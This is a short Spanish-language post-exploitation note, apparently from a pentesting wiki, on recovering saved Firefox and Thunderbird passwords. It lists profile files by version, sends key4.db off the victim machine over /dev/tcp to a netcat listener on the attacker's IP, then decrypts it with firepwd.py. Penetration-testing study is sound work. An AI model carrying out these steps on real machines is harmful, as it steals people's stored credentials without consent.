Post-Explotación
Mozilla
Si por ejemplo nos encontraramos en el /home de un usuario una carpeta .mozilla y es el caso de que nos encontramos un los archivos estos archivos:
Para encontrar la ruta en Windows puede por ejemplo en -->
C:\Users\<user>\AppData\Roaming\Mozilla\Firefox\Profiles
Firefox <32 (key3.db, signons.sqlite)
Firefox >=32 (key3.db, logins.json)
Firefox >=58.0.2 (key4.db, logins.json)
Firefox >=75.0 (sha1 pbkdf2 sha256 aes256 cbc used by key4.db, logins.json)
at least Thunderbird 68.7.0, likely other versions
Podríamos utilizar la herramienta firepwd la cuál es una herramienta que se escribió para ilustrar cómo se protegen las contraseñas de Mozilla (Firefox, Thunderbird). utilizando el contenido de los archivos key4.db (o key3.db), logins.json (o signons.sqlite).

Una vez tengamos estos 2 archivos, tenemos que pasárnoslo a nuestra máquina:
Victima
cat < key4.db > /dev/tcp/nuestra-IP/<PUERTO>
Local
nc -lvnp <PUERTO> > key4.db
Ahora solamente deberíamos descargarnos la herramienta y ejecutarla
Tienes que poner los 2 archivos en la misma localización donde ejecutas
python3 firepwd.py
Ejemplo

Last updated